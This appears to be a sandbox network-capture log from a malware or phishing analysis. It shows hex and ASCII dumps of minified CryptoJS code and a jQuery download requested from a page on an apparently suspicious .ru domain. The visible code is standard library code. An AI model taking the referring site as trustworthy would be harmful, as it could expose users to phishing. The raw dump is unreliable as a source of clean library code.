                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d
                                                                  Data Ascii: lone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.random
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d
                                                                  Data Ascii: "==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b
                                                                  Data Ascii: {for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31
                                                                  Data Ascii: ?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<1
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                  Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                  Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                  Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                  2025-01-13 21:37:20 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                  Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.1649728151.101.130.1374437000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-13 21:37:20 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: cross-site
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: script
                                                                  Referer: https://m7sn.shaceshrov.ru/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2025-01-13 21:37:20 UTC611INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Age: 2288767
                                                                  Date: Mon, 13 Jan 2025 21:37:20 GMT
                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890053-NYC
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 55, 0
                                                                  X-Timer: S1736804241.717147,VS0,VE1
                                                                  Vary: Accept-Encoding
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                  2025-01-13 21:37:20 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
